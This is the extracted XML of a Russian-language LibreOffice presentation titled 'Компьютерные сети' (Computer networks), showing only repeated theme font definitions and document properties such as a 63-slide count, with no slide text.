<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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0.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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4.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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5.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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6.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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7.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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8.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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9.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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0.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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4.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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5.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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6.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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7.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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8.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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9.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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0.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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4.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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5.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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6.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xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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6.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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7.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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8.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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9.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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7721</TotalTime>
  <Application>LibreOffice/24.2.7.2$Linux_X86_64 LibreOffice_project/420$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Words>8149</Words>
  <Paragraphs>627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1601-01-01T00:00:00Z</dcterms:created>
  <dc:creator>Пользователь</dc:creator>
  <dc:description/>
  <dc:language>ru-RU</dc:language>
  <cp:lastModifiedBy/>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-12T11:49:31Z</dcterms:modified>
  <cp:revision>1008</cp:revision>
  <dc:subject/>
  <dc:title>Компьютерные сети??</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63</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="PresentationFormat">
    <vt:lpwstr>Экран (4:3)</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Slides">
    <vt:i4>63</vt:i4>
  </property>
</Properties>
</file>